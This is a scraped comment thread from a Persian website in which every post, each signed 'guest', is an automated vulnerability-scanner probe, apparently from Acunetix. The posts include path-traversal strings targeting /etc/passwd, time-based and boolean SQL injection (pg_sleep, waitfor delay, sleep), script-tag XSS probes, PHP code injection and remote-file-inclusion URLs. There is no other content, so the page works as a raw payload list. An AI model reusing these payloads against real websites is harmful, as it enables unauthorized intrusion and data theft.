مهمان 11 مهر 1396 - 14:51

/../..//../..//../..//../..//../..//etc/passwd.jpg

مهمان 11 مهر 1396 - 14:51

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 11 مهر 1396 - 14:51

../../../../../../../../../../etc/passwd.jpg

مهمان 11 مهر 1396 - 14:50

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 11 مهر 1396 - 14:50

../../../../../../../../../../../../../../../proc/version

مهمان 11 مهر 1396 - 14:50

../../../../../../../../../../etc/passwd

مهمان 11 مهر 1396 - 14:50

362'

مهمان 11 مهر 1396 - 14:50

RafWb6BW'));select pg_sleep(21); --

مهمان 11 مهر 1396 - 14:50

OHdl0Yg6');select pg_sleep(21); --

مهمان 11 مهر 1396 - 14:50

LockKaMN';select pg_sleep(21); --

مهمان 11 مهر 1396 - 14:50

-1));select pg_sleep(14); --

مهمان 11 مهر 1396 - 14:50

-1);select pg_sleep(14); --

مهمان 11 مهر 1396 - 14:50

-1;select pg_sleep(14); --

مهمان 11 مهر 1396 - 14:50

MkcdPmJd'; waitfor delay '0:0:14' --

مهمان 11 مهر 1396 - 14:50

1 waitfor delay '0:0:14' --

مهمان 11 مهر 1396 - 14:50

-1); waitfor delay '0:0:14' --

مهمان 11 مهر 1396 - 14:50

-1; waitfor delay '0:0:7' --

مهمان 11 مهر 1396 - 14:50

(select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/

مهمان 11 مهر 1396 - 14:50

if(now()=sysdate(),sleep(7),0)/*'XOR(if(now()=sysdate(),sleep(7),0))OR'"XOR(if(now()=sysdate(),sleep(7),0))OR"*/

مهمان 11 مهر 1396 - 14:50

-1" OR 2+560-560-1=0+0+0+1 --

مهمان 11 مهر 1396 - 14:50

-1' OR 2+420-420-1=0+0+0+1 or 'Bl4ufbSH'='

مهمان 11 مهر 1396 - 14:50

-1' OR 2+422-422-1=0+0+0+1 --

مهمان 11 مهر 1396 - 14:50

-1 OR 2+331-331-1=0+0+0+1

مهمان 11 مهر 1396 - 14:50

-1 OR 2+65-65-1=0+0+0+1 --

مهمان 11 مهر 1396 - 14:50

oKYTZgqN

مهمان 11 مهر 1396 - 14:50

1

مهمان 11 مهر 1396 - 14:50

1

مهمان 11 مهر 1396 - 14:50

19488976

مهمان 11 مهر 1396 - 14:49

'"()&%<acx><script>bJSu(9123)</script></acx>

مهمان 11 مهر 1396 - 14:49

1'"()&%<acx><script>bJSu(9083)</script></acx>

مهمان 11 مهر 1396 - 14:49

�''�""

مهمان 11 مهر 1396 - 14:49

�'�"

مهمان 11 مهر 1396 - 14:49

JyI=

مهمان 11 مهر 1396 - 14:49

@@qgtGu

مهمان 11 مهر 1396 - 14:49

1����%2527%2522

مهمان 11 مهر 1396 - 14:49

\

مهمان 11 مهر 1396 - 14:49

1'"

مهمان 11 مهر 1396 - 14:49

مهمان 11 مهر 1396 - 14:49

'"

مهمان 11 مهر 1396 - 14:49

/www.vulnweb.com

مهمان 11 مهر 1396 - 14:49

${@print(md5(acunetix_wvs_security_test))}\

مهمان 11 مهر 1396 - 14:49

${@print(md5(acunetix_wvs_security_test))}

مهمان 11 مهر 1396 - 14:49

";print(md5(acunetix_wvs_security_test));$a="

مهمان 11 مهر 1396 - 14:49

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

مهمان 11 مهر 1396 - 14:49

';print(md5(acunetix_wvs_security_test));$a='

مهمان 11 مهر 1396 - 14:49

;print(md5(acunetix_wvs_security_test));

مهمان 11 مهر 1396 - 14:49

post-comment-topic/.

مهمان 11 مهر 1396 - 14:49

post-comment-topic

مهمان 11 مهر 1396 - 14:49

post-comment-topic

مهمان 11 مهر 1396 - 14:49

http://hityrcDPKeK6N.bxss.me/

مهمان 11 مهر 1396 - 14:49

testasp.vulnweb.com

مهمان 11 مهر 1396 - 14:49

http://testasp.vulnweb.com/t/fit.txt?.jpg

مهمان 11 مهر 1396 - 14:49

Http://testasp.vulnweb.com/t/fit.txt

مهمان 11 مهر 1396 - 14:49

1some_inexistent_file_with_long_name.jpg

مهمان 11 مهر 1396 - 14:49

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

مهمان 11 مهر 1396 - 14:49

^(#$!@#$)(()))******

مهمان 11 مهر 1396 - 14:48

!(()&&!|*|*|